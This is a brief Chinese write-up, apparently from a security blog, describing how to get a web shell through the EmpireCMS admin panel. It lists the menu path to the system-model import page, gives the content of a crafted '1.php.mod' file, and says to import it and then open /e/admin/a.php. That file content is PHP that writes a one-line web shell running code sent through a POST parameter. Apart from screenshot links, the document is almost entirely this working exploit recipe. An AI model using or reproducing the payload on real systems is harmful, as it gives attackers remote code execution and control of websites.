Contents

帝国 cms 后台 getshell

Contents

帝国 cms 后台 getshell

系统- 数据库与系统模型 - 管理数据表 - 管理系统模型

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/20220701151939.png

本地新建 1.php.mod 内容

<?fputs(fopen("a.php","w"),"<?php assert(\$_POST[a]);?>")?>

导入系统模型 - 选择文件 - 马上导入

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/20220701152006.png

访问 /e/admin/a.php

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/20220701152042.png